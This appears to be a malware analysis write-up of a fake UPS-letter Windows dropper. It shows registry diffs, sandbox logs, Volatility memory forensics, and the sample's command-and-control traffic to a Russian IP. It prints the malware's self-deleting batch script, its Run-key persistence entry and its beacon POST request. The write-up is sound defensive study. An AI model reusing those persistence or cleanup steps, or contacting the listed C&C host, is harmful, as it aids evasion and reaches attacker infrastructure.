00 65 00 00 00 1A 00 02 00 00 00 AA 00 00 00 6E 00 32 00 E6 02 00 00 FE 40 CF 5C 20 00 53 48 4F 52 54 43 7E 31 2E 4C 4E 4B 00 00 52 00 03 00 04 00 EF BE FE 40 CF 5C FE 40 9C 65 14 00 00 00 53 00 68 00 6F 00 72 00 74 00 63 00 75 00 74 00 20 00 74 00 6F 00 20 00 52 00 65 00 73 00 48 00 61 00 63 00 6B 00 65 00 72 00 2E 00 65 00 78 00 65 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 DC 00 00 00 1A 01 00 00 4E 00 32 00 D1 05 00 00 FE 40 8D 65 20 00 57 49 52 45 53 48 7E 31 2E 4C 4E 4B 00 00 32 00 03 00 04 00 EF BE FE 40 8D 65 FF 40 AC 39 14 00 00 00 57 00 69 00 72 00 65 00 73 00 68 00 61 00 72 00 6B 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 DC 00 00 00 1A 01 00 00 00 00 00 00
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\19\Shell\ItemPos1280x1024(1): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 DC 00 00 00 AA 00 00 00 40 00 31 00 00 00 00 00 FE 40 47 65 10 00 61 70 61 74 65 44 4E 53 00 00 28 00 03 00 04 00 EF BE FE 40 47 65 FF 40 AB 39 14 00 00 00 61 00 70 00 61 00 74 00 65 00 44 00 4E 00 53 00 00 00 18 00 DC 00 00 00 02 00 00 00 52 00 31 00 00 00 00 00 FE 40 73 46 10 00 44 45 50 45 4E 44 7E 31 00 00 3A 00 03 00 04 00 EF BE FE 40 73 46 FF 40 AD 39 14 00 00 00 44 00 65 00 70 00 65 00 6E 00 64 00 65 00 6E 00 63 00 79 00 20 00 57 00 61 00 6C 00 6B 00 65 00 72 00 00 00 18 00 DC 00 00 00 E2 00 00 00 2E 00 31 00 00 00 00 00 FE 40 95 65 10 00 6E 63 00 00 1C 00 03 00 04 00 EF BE FE 40 95 65 FE 40 9A 65 14 00 00 00 6E 00 63 00 00 00 12 00 02 00 00 00 02 00 00 00 3C 00 31 00 00 00 00 00 FB 40 A8 69 10 00 6F 64 62 67 31 31 30 00 26 00 03 00 04 00 EF BE FB 40 A8 69 FE 40 E3 59 14 00 00 00 6F 00 64 00 62 00 67 00 31 00 31 00 30 00 00 00 16 00 02 00 00 00 3A 00 00 00 58 00 31 00 00 00 00 00 FE 40 A3 44 10 00 50 45 49 44 2D 30 7E 31 2E 39 35 2D 00 00 3C 00 03 00 04 00 EF BE FE 40 A3 44 FE 40 E3 59 14 00 00 00 50 00 45 00 69 00 44 00 2D 00 30 00 2E 00 39 00 35 00 2D 00 32 00 30 00 30 00 38 00 31 00 31 00 30 00 33 00 00 00 1C 00 02 00 00 00 1A 01 00 00 4E 00 31 00 00 00 00 00 FE 40 C6 64 10 00 50 52 4F 43 45 53 7E 32 00 00 36 00 03 00 04 00 EF BE FE 40 C6 64 FF 40 B0 39 14 00 00 00 50 00 72 00 6F 00 63 00 65 00 73 00 73 00 45 00 78 00 70 00 6C 00 6F 00 72 00 65 00 72 00 00 00 18 00 DC 00 00 00 72 00 00 00 4C 00 31 00 00 00 00 00 FE 40 93 64 10 00 50 52 4F 43 45 53 7E 31 00 00 34 00 03 00 04 00 EF BE FE 40 93 64 FF 40 B3 39 14 00 00 00 50 00 72 00 6F 00 63 00 65 00 73 00 73 00 4D 00 6F 00 6E 00 69 00 74 00 6F 00 72 00 00 00 18 00 02 00 00 00 E2 00 00 00 3C 00 31 00 00 00 00 00 FE 40 15 65 10 00 52 65 67 53 68 6F 74 00 26 00 03 00 04 00 EF BE FE 40 15 65 FF 40 B8 39 14 00 00 00 52 00 65 00 67 00 53 00 68 00 6F 00 74 00 00 00 16 00 02 00 00 00 72 00 00 00 4A 00 31 00 00 00 00 00 FE 40 2B 45 10 00 53 4E 49 50 50 49 7E 31 00 00 32 00 03 00 04 00 EF BE FE 40 24 45 FE 40 40 52 14 00 00 00 53 00 6E 00 69 00 70 00 70 00 69 00 6E 00 67 00 54 00 6F 00 6F 00 6C 00 73 00 00 00 18 00 DC 00 00 00 3A 00 00 00 46 00 32 00 00 08 01 00 A9 3E 20 39 20 00 50 45 76 69 65 77 2E 65 78 65 00 00 2C 00 03 00 04 00 EF BE FE 40 05 5A FF 40 AB 39 14 00 00 00 50 00 45 00 76 00 69 00 65 00 77 00 2E 00 65 00 78 00 65 00 00 00 1A 00 02 00 00 00 AA 00 00 00 6E 00 32 00 E6 02 00 00 FE 40 CF 5C 20 00 53 48 4F 52 54 43 7E 31 2E 4C 4E 4B 00 00 52 00 03 00 04 00 EF BE FE 40 CF 5C FE 40 9C 65 14 00 00 00 53 00 68 00 6F 00 72 00 74 00 63 00 75 00 74 00 20 00 74 00 6F 00 20 00 52 00 65 00 73 00 48 00 61 00 63 00 6B 00 65 00 72 00 2E 00 65 00 78 00 65 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 DC 00 00 00 1A 01 00 00 4E 00 32 00 D1 05 00 00 FE 40 8D 65 20 00 57 49 52 45 53 48 7E 31 2E 4C 4E 4B 00 00 32 00 03 00 04 00 EF BE FE 40 8D 65 FF 40 AC 39 14 00 00 00 57 00 69 00 72 00 65 00 73 00 68 00 61 00 72 00 6B 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 DC 00 00 00 1A 01 00 00 00 00 00 00
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\21\Shell\WinPos1280x1024(1).left: 0x00000123
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\21\Shell\WinPos1280x1024(1).left: 0x0000007F
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\21\Shell\WinPos1280x1024(1).top: 0x00000092
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\21\Shell\WinPos1280x1024(1).top: 0x0000016D
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\21\Shell\WinPos1280x1024(1).right: 0x00000443
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\21\Shell\WinPos1280x1024(1).right: 0x0000039F
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\21\Shell\WinPos1280x1024(1).bottom: 0x000002EA
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\21\Shell\WinPos1280x1024(1).bottom: 0x000003C5
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\21\Shell\ItemPos1280x1024(1): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 DC 00 00 00 AA 00 00 00 2E 00 31 00 00 10 00 00 FE 40 2E 5E 10 00 72 77 00 00 1C 00 03 00 04 00 EF BE FE 40 2E 5E FE 40 2A 5E 14 00 00 00 72 00 77 00 00 00 12 00 02 00 00 00 02 00 00 00 40 00 32 00 01 1A 00 00 F9 40 C9 40 80 00 61 67 65 6E 74 2E 70 79 00 00 28 00 03 00 04 00 EF BE F9 40 C9 40 F9 40 C9 40 14 00 00 00 61 00 67 00 65 00 6E 00 74 00 2E 00 70 00 79 00 00 00 18 00 DC 00 00 00 02 00 00 00 52 00 32 00 00 A6 00 00 FB 40 30 40 80 00 42 42 42 20 72 65 70 6F 72 74 2E 65 78 65 00 00 34 00 03 00 04 00 EF BE FE 40 29 5E FB 40 30 40 14 00 00 00 42 00 42 00 42 00 20 00 72 00 65 00 70 00 6F 00 72 00 74 00 2E 00 65 00 78 00 65 00 00 00 1E 00 02 00 00 00 3A 00 00 00 58 00 32 00 00 B4 01 00 FB 40 B5 3D 80 00 44 48 4C 2D 53 68 69 70 70 69 6E 67 2E 65 78 65 00 00 38 00 03 00 04 00 EF BE FE 40 29 5E FB 40 B5 3D 14 00 00 00 44 00 48 00 4C 00 2D 00 53 00 68 00 69 00 70 00 70 00 69 00 6E 00 67 00 2E 00 65 00 78 00 65 00 00 00 20 00 DC 00 00 00 3A 00 00 00 42 00 32 00 B4 21 1A 03 FE 40 50 5E 80 00 64 75 6D 70 2E 70 63 61 70 00 2A 00 03 00 04 00 EF BE FE 40 50 5E F7 40 01 71 14 00 00 00 64 00 75 00 6D 00 70 00 2E 00 70 00 63 00 61 00 70 00 00 00 18 00 02 00 00 00 72 00 00 00 40 00 32 00 00 4E 01 00 FE 40 D4 44 80 00 64 75 71 75 2E 65 78 65 00 00 28 00 03 00 04 00 EF BE FE 40 29 5E FE 40 D4 44 14 00 00 00 64 00 75 00 71 00 75 00 2E 00 65 00 78 00 65 00 00 00 18 00 DC 00 00 00 72 00 00 00 A2 00 32 00 00 E0 00 00 FB 40 E6 69 80 00 50 6F 73 74 65 74 69 6B 65 74 74 5F 44 65 75 74 73 63 68 65 5F 50 6F 73 74 5F 41 47 5F 44 45 34 38 32 34 35 36 2E 65 78 65 00 6A 00 03 00 04 00 EF BE FE 40 DC 5C FB 40 E6 69 14 00 00 00 50 00 6F 00 73 00 74 00 65 00 74 00 69 00 6B 00 65 00 74 00 74 00 5F 00 44 00 65 00 75 00 74 00 73 00 63 00 68 00 65 00 5F 00 50 00 6F 00 73 00 74 00 5F 00 41 00 47 00 5F 00 44 00 45 00 34 00 38 00 32 00 34 00 35 00 36 00 2E 00 65 00 78 00 65 00 00 00 38 00 02 00 00 00 AA 00 00 00 A2 00 32 00 50 00 00 00 FB 40 82 6A 80 00 50 6F 73 74 65 74 69 6B 65 74 74 5F 44 65 75 74 73 63 68 65 5F 50 6F 73 74 5F 41 47 5F 44 45 34 38 32 34 35 36 2E 74 78 74 00 6A 00 03 00 04 00 EF BE FB 40 82 6A FB 40 82 6A 14 00 00 00 50 00 6F 00 73 00 74 00 65 00 74 00 69 00 6B 00 65 00 74 00 74 00 5F 00 44 00 65 00 75 00 74 00 73 00 63 00 68 00 65 00 5F 00 50 00 6F 00 73 00 74 00 5F 00 41 00 47 00 5F 00 44 00 45 00 34 00 38 00 32 00 34 00 35 00 36 00 2E 00 74 00 78 00 74 00 00 00 38 00 02 00 00 00 AA 00 00 00 00 00 00 00
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\21\Shell\ItemPos1280x1024(1): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 00 00 00 52 00 32 00 00 A6 00 00 FE 40 A2 6B 80 00 42 42 42 20 72 65 70 6F 72 74 2E 65 78 65 00 00 34 00 03 00 04 00 EF BE FE 40 A2 6B FE 40 A2 6B 14 00 00 00 42 00 42 00 42 00 20 00 72 00 65 00 70 00 6F 00 72 00 74 00 2E 00 65 00 78 00 65 00 00 00 1E 00 DC 00 00 00 02 00 00 00 58 00 32 00 00 B4 01 00 FE 40 9B 6B 80 00 44 48 4C 2D 53 68 69 70 70 69 6E 67 2E 65 78 65 00 00 38 00 03 00 04 00 EF BE FE 40 9B 6B FE 40 9B 6B 14 00 00 00 44 00 48 00 4C 00 2D 00 53 00 68 00 69 00 70 00 70 00 69 00 6E 00 67 00 2E 00 65 00 78 00 65 00 00 00 20 00 DC 00 00 00 3A 00 00 00 54 00 32 00 9C 60 0A 00 FC 40 65 8F 80 00 64 75 71 75 2E 30 78 35 30 39 38 2E 69 64 62 00 36 00 03 00 04 00 EF BE FC 40 65 8F FC 40 65 8F 14 00 00 00 64 00 75 00 71 00 75 00 2E 00 30 00 78 00 35 00 30 00 39 00 38 00 2E 00 69 00 64 00 62 00 00 00 1E 00 02 00 00 00 3A 00 00 00 40 00 32 00 00 4E 01 00 FE 40 8C 69 80 00 64 75 71 75 2E 65 78 65 00 00 28 00 03 00 04 00 EF BE FE 40 8C 69 FE 40 8C 69 14 00 00 00 64 00 75 00 71 00 75 00 2E 00 65 00 78 00 65 00 00 00 18 00 02 00 00 00 72 00 00 00 8A 00 32 00 00 3C 01 00 FE 40 18 72 80 00 55 50 53 5F 43 4F 4C 4C 45 43 54 5F 4C 45 54 54 45 52 5F 4E 38 38 32 33 34 32 35 34 35 2E 65 78 65 00 5A 00 03 00 04 00 EF BE FE 40 18 72 FE 40 18 72 14 00 00 00 55 00 50 00 53 00 5F 00 43 00 4F 00 4C 00 4C 00 45 00 43 00 54 00 5F 00 4C 00 45 00 54 00 54 00 45 00 52 00 5F 00 4E 00 38 00 38 00 32 00 33 00 34 00 32 00 35 00 34 00 35 00 2E 00 65 00 78 00 65 00 00 00 30 00 02 00 00 00 72 00 00 00 00 00 00 00
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\22\Shell\WinPos1280x1024(1).left: 0x00000008
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\22\Shell\WinPos1280x1024(1).left: 0x0000007F
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\22\Shell\WinPos1280x1024(1).top: 0x00000108
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\22\Shell\WinPos1280x1024(1).top: 0x0000016D
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\22\Shell\WinPos1280x1024(1).right: 0x00000328
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\22\Shell\WinPos1280x1024(1).right: 0x0000039F
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\22\Shell\WinPos1280x1024(1).bottom: 0x00000360
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\22\Shell\WinPos1280x1024(1).bottom: 0x000003C5

----------------------------------
Total changes:28

----------------------------------

CaptureBAT revealed additional useful information:

"06/8/2012 14:11:8.612","registry","SetValueKey","C:\Documents and Settings\xxx\Desktop\mw\UPS_COLLECT_LETTER_N882342545.exe","HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData"

Registers the malware as startup profile for the web browser "06/8/2012 14:11:8.612","registry","SetValueKey","C:\Documents and Settings\xxx\Desktop\mw\UPS_COLLECT_LETTER_N882342545.exe","HKCU\Software\Microsoft\Windows\CurrentVersion\Run\KB00925890.exe" Malware copy is added to autostart "06/8/2012 14:11:10.915","registry","SetValueKey","C:\Documents and Settings\xxx\Application Data\KB00925890.exe","HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData" Same as above???

Network

Attempt to connect to port 8080 on IP 78.46.64.17 (Hetzner, Germany). Host is unreachable thus no TCP connection can be established
Now successfully opens up a connected to 84.53.217.109, port 8080 http://84.53.217.109:8080/mx5/C/in/. IP address is located in Russia

inetnum: 84.53.217.104 - 84.53.217.111 netname: RT-VLD-INFRA remarks: INFRA-AW descr: VladimirbranchRT Limited country: RU
Server is a nginx Version 1.0.10 on Debian Squeeze with PHP 5.3.3-7
First query is a POST with the default User-Agent:

POST /mx5/C/in/ HTTP/1.1 Accept: / User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US) Host: 84.53.217.109:8080 Content-Length: 348 Connection: Keep-Alive Cache-Control: no-cache
POST sends 348 bytes raw data, starting with0xdeadbeef:

% xxd post.raw | head

0000000: dead beef 5c01 0000 0100 0000 72e2 a30a ...........r... 0000010: a9b3 9ef8 31a8 bc24 907e 5029 bf8d cabf ....1..$.~P).... 0000020: 6db3 c551 8c13 fb2c fe02 b052 d708 7a86 m..Q...,...R..z. 0000030: 4abf 88a0 3949 9561 25f0 1d3d 4f3b 814a J...9I.a%..=O;.J 0000040: 0f2d 92e7 1ac6 56ac da53 5627 b133 452b .-....V..SV'.3E+ 0000050: b545 0baa 9457 d3fe 96d3 76e3 919e afe4 .E...W....v..... 0000060: 9030 bfae 7bae cf66 1b67 4473 aac1 5584 .0..{..f.gDs..U. 0000070: 4726 1bb4 f69c 8a3c bfbe 2803 5dd0 76d3 G&.....<..(.].v. 0000080: 0d15 5057 8389 d338 ab58 000000011590e43f 3dec ac2c ..PW...8.X.?=.., 0000090: b62b 98dc 89eb a8a0 5203 5ff3 785b 308e .+......R._.x[0.
Server sends OK

HTTP/1.1 200 OK Server: nginx/1.0.10 Date: Tue, 31 Jul 2012 07:17:25 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive Content-Length: 2503 X-Powered-By: PHP/5.3.3-7+squeeze13 Vary: Accept-Encoding
also with binary data starting with 0xdeadbeef:

File System

I used CaptureBAT in oder to record all activity in terms of network, file system and registry. It also saved the temporary batch file created by the malware.

"06/8/2012 14:11:9.924","file","Write","C:\WINDOWS\system32\cmd.exe","C:\Program Files\Capture\logs\deleted_files\C\Documents and Settings\xxx\Local Settings\Temp\exp1.tmp.bat"
"06/8/2012 14:11:9.924","file","Delete","C:\WINDOWS\system32\cmd.exe","C:\Documents and Settings\xxx\Local Settings\Temp\exp1.tmp.bat"

It's purpose is to delete the malware binary:

% cat exp1.tmp.bat 000000011590
@echo off
:R
del /F /Q /A "C:\Documents and Settings\xxx\Desktop\mw\UPS_COLLECT_LETTER_N882342545.exe"
if exist "C:\Documents and Settings\xxx\Desktop\mw\UPS_COLLECT_LETTER_N882342545.exe" goto R
del /F /Q /A "C:\DOCUME~1\XXX~1\LOCALS~1\Temp\exp1.tmp.bat"

What is suspicious is that explorer.exe writes a HTML file to disk that looks similar to the one downloaded from the C&C server:

"06/8/2012 14:11:32.226","file","Write", "C:\WINDOWS\explorer.exe","C:\Documents and Settings\xxx\Local Settings\Temporary Internet Files\Content.IE5\A65EQAIB\in[1].htm"
"06/8/2012 14:11:32.226","file","Delete","C:\WINDOWS\explorer.exe","C:\Documents and Settings\xxx\Local Settings\Temporary Internet Files\Content.IE5\A65EQAIB\in[1].htm"


% xxd in\[1\].htm| head
0000000: dead beef c709 0000 0100 0000 c47a b3ba  .............z..
0000010: 1cbd 0669 ee22 007e 9907 9e04 7002 3749  ...i.".~....p.7I
0000020: 716c afae 7df1 27bf c8da 71e5 8b25 07d5  ql..}.'...q..%..
0000030: 6528 cf97 ee1c b7da 7191 6d69 b346 3e58  e(......q.mi.F>X
0000040: 18c1 3742 7495 f5bc bdbb 21db fd11 c447  ..7Bt.....!....G
0000050: bcb2 d109 1750 efb0 318b 356d ffcd 9d31  .....P..1.5m...1
0000060: 3e91 2b27 e548 5255 1144 8db9 40b9 e243  >.+'.HRU.D..@..C
0000070: f58b dfbf 9d20 2365 fe63 472d d93e d8f4  ..... #e.cG-.>..
0000080: 122b a616 116c d0a7 5e9a 608a da39 a3ee  .+...l..^.`..9..
0000090: 5e6b 4b0d 3255 bfef 9560 1890 afd8 0709  ^kK.2U...`......

It is actually nearly the same as the one gotten for the POST-request:

% cmp http_ok.raw ../written_files/in\[1\].htm -c
http_ok.raw ../written_files/in[1].htm differ: byte 161, line 1 is 142 b 131 Y

Virtual Memory

I used VBox debug commands to create a memory snapshot during runtime.

Running Processes

I used the Volatility framework to analyze the memory dump:

% python vol.py imageinfo                                               
Volatile Systems Volatility Framework 2.1_rc3
Determining profile based on KDBG search...

          Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86
                     AS Layer1 : JKIA32PagedMemoryPae (Kernel AS)
                     AS Layer2 : VirtualBoxCoreDumpElf64 (/home/xxx/ups_collect3.elf)
                     AS Layer3 : FileAddressSpace (/home/xxx/ups_collect3.elf)
                      PAE type : PAE
                           DTB : 0x312000L
                          KDBG : 0x80545ae0
          Number of Processors : 1
     Image Type (Service Pack) : 3
                KPCR for CPU 0 : 0xffdff000
             KUSER_SHARED_DATA : 0xffdf0000
           Image date and time : 2012-08-06 07:20:26 UTC+0000
     Image local date and time : 2012-08-06 09:20:26 +0200

% export VOLATILITY_LOCATION=file:///home/xxx/ups_collect3.elf
% export VOLATILITY_PROFILE=WinXPSP3x86

Volatily's pslist shows the copy of the malware processes if the snapshot was taken fast enough.

% python vol.py pslist         
Volatile Systems Volatility Framework 2.1_rc3
Offset(V)  Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                Exit                
---------- -------------------- ------ ------ ------ -------- ------ ------ -------------------- --------------------
0x823c89c8 System                    4      0     54      236 ------      0                                          
0x821d5c30 smss.exe                360      4      3       19 ------      0 2012-08-06 14:13:57                      
0x822d1020 csrss.exe               460    360     11      338      0      0 2012-08-06 14:13:57                      
0x8223e020 winlogon.exe            488    360     21      502      0      0 2012-08-06 14:13:57                      
0x822bd578 services.exe            648    488     16      246      0      0 2012-08-06 14:13:57                      
0x8219d458 lsass.exe               660    488     23      342      0      0 2012-08-06 14:13:57                      
0x82219438 VBoxService.exe         820    648      8      106      0      0 2012-08-06 14:13:58                      
0x821c17c0 svchost.exe             864    648     20      199      0      0 2012-08-06 14:13:58                      
0x82160020 svchost.exe             948    648     10      225      0      0 2012-08-06 14:13:58                      
0x82248478 svchost.exe            1040    648     66     1118      0      0 2012-08-06 14:13:58                      
0x82279020 svchost.exe            1096    648      5       74      0      0 2012-08-06 14:13:58                      
0x8221c818 svchost.exe            1148    648     14      195      0      0 2012-08-06 14:13:58                      
0x8205cb88 explorer.exe           1512   1468     14      433      0      0 2012-08-06 14:13:58                      
0x8215d880 spoolsv.exe            1592    648     13      117      0      0 2012-08-06 14:13:58                      
0x82107da0 VBoxTray.exe           1684   1512      7       65      0      0 2012-08-06 14:13:59                      
0x82249020 ctfmon.exe             1692   1512      1       70      0      0 2012-08-06 14:13:59                      
0x821da3c0 wuauclt.exe             160   1040      8      132      0      0 2012-08-06 14:14:08                      
0x81ff2628 alg.exe                 872    648      7      102      0      0 2012-08-06 09:13:40                      
0x82190b10 KB00925890.exe          652   1388      1       14      0      0 2012-08-06 09:14:21
       ^^^^^

psscan reveals the original process:

% python vol.py psscan
Volatile Systems Volatility Framework 2.1_rc3
Offset(P)  Name                PID   PPID PDB        Time created         Time exited         
---------- ---------------- ------ ------ ---------- -------------------- --------------------
0x021f2628 alg.exe             872    648 0x0c000240 2012-08-06 09:13:40                      
0x0225cb88 explorer.exe       1512   1468 0x0c0001c0 2012-08-06 14:13:58                      
0x02264020 cmd.exe             232   1388 0x0c000280 2012-08-06 09:14:21  2012-08-06 09:14:22
0x02307da0 VBoxTray.exe       1684   1512 0x0c000200 2012-08-06 14:13:59                      
0x0235d880 spoolsv.exe        1592    648 0x0c0001e0 2012-08-06 14:13:58                      
0x02360020 svchost.exe         948    648 0x0c000100 2012-08-06 14:13:58                      
0x02390b10 KB00925890.exe      652   1388 0x0c000260 2012-08-06 09:14:21                      
0x0239d458 lsass.exe           660    488 0x0c0000a0 2012-08-06 14:13:57                      
0x023c17c0 svchost.exe         864    648 0x0c0000e0 2012-08-06 14:13:58                      
0x023d5c30 smss.exe            360      4 0x0c000020 2012-08-06 14:13:57                      
0x023da3c0 wuauclt.exe         160   1040 0x0c000220 2012-08-06 14:14:08                      
0x02419438 VBoxService.exe     820    648 0x0c0000c0 2012-08-06 14:13:58                      
0x0241c818 svchost.exe        1148    648 0x0c000160 2012-08-06 14:13:58                      
0x0243e020 winlogon.exe        488    360 0x0c000060 2012-08-06 14:13:57                      
0x02448478 svchost.exe        1040    648 0x0c000120 2012-08-06 14:13:58                      
0x02449020 ctfmon.exe         1692   1512 0x0c000180 2012-08-06 14:13:59                      
0x02479020 svchost.exe        1096    648 0x0c000140 2012-08-06 14:13:58                      
0x024b1820 UPS_COLLECT_LET    1388   1512 0x0c0001a0 2012-08-06 09:14:19  2012-08-06 09:14:21
       ^^^^^
0x024bd578 services.exe        648    488 0x0c000080 2012-08-06 14:13:57                      
0x024d1020 csrss.exe           460    360 0x0c000040 2012-08-06 14:13:57                      
0x025c89c8 System                4      0 0x00312000

Used Libraries

The copied process uses the following DLLs:

% python vol.py dlllist -p 652
Volatile Systems Volatility Framework 2.1_rc3
************************************************************************
KB00925890.exe pid:    652
Command line : "C:\Documents and Settings\xxx\Application Data\KB00925890.exe"
Service Pack 3

Base             Size Path
---------- ---------- ----
0x00400000    0x28000 C:\Documents and Settings\xxx\Application Data\KB00925890.exe
0x7c900000    0xaf000 C:\WINDOWS\system32\ntdll.dll
0x7c800000    0xf6000 C:\WINDOWS\system32\kernel32.dll
0x774e0000   0x13d000 C:\WINDOWS\system32\ole32.dll
0x77dd0000    0x9b000 C:\WINDOWS\system32\ADVAPI32.dll
0x77e70000    0x92000 C:\WINDOWS\system32\RPCRT4.dll
0x77fe0000    0x11000 C:\WINDOWS\system32\Secur32.dll
0x77f10000    0x49000 C:\WINDOWS\system32\GDI32.dll
0x7e410000    0x91000 C:\WINDOWS\system32\USER32.dll
0x77c10000    0x58000 C:\WINDOWS\system32\msvcrt.dll

Dumping the process's memory

Dumping the process's memory works, but does not reveal any useful information:

% python vol.py memdump -p 652 -D UPS_mem_dump                                                                                      
Volatile Systems Volatility Framework 2.1_rc3
************************************************************************
Writing KB00925890.exe [   652] to 652.dmp

I dumped possible IPs and URLs from the memory, but no success:

% strings 652.dmp| perl -e 'while(<>){ if(/(http|https|ftp|mail)\:[\/\w.]+/){print $_;}}' | sort -u > URLs.txt
% strings 652.dmp| perl -e 'while(<>){if(/(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)/){print $_;}}' | sort -u > IPs.txt

Dumping the process's executable reveals the following:

% python vol.py procmemdump -p 652 --dump-dir=UPS_mem_dump/
Volatile Systems Volatility Framework 2.1_rc3
Process(V) ImageBase  Name                 Result
---------- ---------- -------------------- ------
0x82190b10 0x00400000 KB00925890.exe       OK: executable.652.exe


% file executable.652.exe
executable.652.exe: PE32 executable (GUI) Intel 80386, for MS Windows
% md5sum executable.652.exe  
47834ef1825e220ec77dd78ac75b1cbf  executable.652.exe
% clamscan executable.652.exe
executable.652.exe: OK

A quick strings check did not show any useful information. The binary contains quite a number of encrypted/obfuscated strings.

File System Objects

A filescan show the batch file created by the malware:

% python vol.py filescan
Offset(P)    #Ptr   #Hnd Access Name
---------- ------ ------ ------ ----
[...]
0x023e6f90      2      0 -W-r-- \DOCUME~1\XXX~1\LOCALS~1\Temp\exp1.tmp.bat
[...]

Injected Processes

According to malfind the following processes are injected.

Process: csrss.exe Pid: 460 Address: 0x7f6f0000
Vad Tag: Vad  Protection: PAGE_EXECUTE_READWRITE
Flags: Protection: 6

0x7f6f0000  c8 00 00 00 3d 01 00 00 ff ee ff ee 08 70 00 00   ....=........p..
0x7f6f0010  08 00 00 00 00 fe 00 00 00 00 10 00 00 20 00 00   ................
0x7f6f0020  00 02 00 00 00 20 00 00 8d 01 00 00 ff ef fd 7f   ................
0x7f6f0030  03 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00   ................

0x7f6f0000 c8000000         ENTER 0x0, 0x0
0x7f6f0004 3d010000ff       CMP EAX, 0xff000001
0x7f6f0009 ee               OUT DX, AL
0x7f6f000a ff               DB 0xff
0x7f6f000b ee               OUT DX, AL
0x7f6f000c 087000           OR [EAX+0x0], DH
0x7f6f000f 0008             ADD [EAX], CL
0x7f6f0011 0000             ADD [EAX], AL
0x7f6f0013 0000             ADD [EAX], AL
0x7f6f0015 fe00             INC BYTE [EAX]
0x7f6f0017 0000             ADD [EAX], AL
0x7f6f0019 0010             ADD [EAX], DL
0x7f6f001b 0000             ADD [EAX], AL
0x7f6f001d 2000             AND [EAX], AL
0x7f6f001f 0000             ADD [EAX], AL
0x7f6f0021 0200             ADD AL, [EAX]
0x7f6f0023 0000             ADD [EAX], AL
0x7f6f0025 2000             AND [EAX], AL
0x7f6f0027 008d010000ff     ADD [EBP-0xffffff], CL
0x7f6f002d ef               OUT DX, EAX
0x7f6f002e fd               STD
0x7f6f002f 7f03             JG 0x7f6f0034
0x7f6f0031 0008             ADD [EAX], CL
0x7f6f0033 06               PUSH ES
0x7f6f0034 0000             ADD [EAX], AL

Process: winlogon.exe Pid: 488 Address: 0x302e0000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 4, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x302e0000  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x302e0010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x302e0020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x302e0030  00 00 00 00 2a 00 2a 00 01 00 00 00 00 00 00 00   ....*.*.........

Process: explorer.exe Pid: 1512 Address: 0x2650000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 1, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x02650000  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x02650010  00 00 65 02 00 00 00 00 00 00 00 00 00 00 00 00   ..e.............
0x02650020  10 00 65 02 00 00 00 00 00 00 00 00 00 00 00 00   ..e.............
0x02650030  20 00 65 02 00 00 00 00 00 00 00 00 00 00 00 00   ..e.............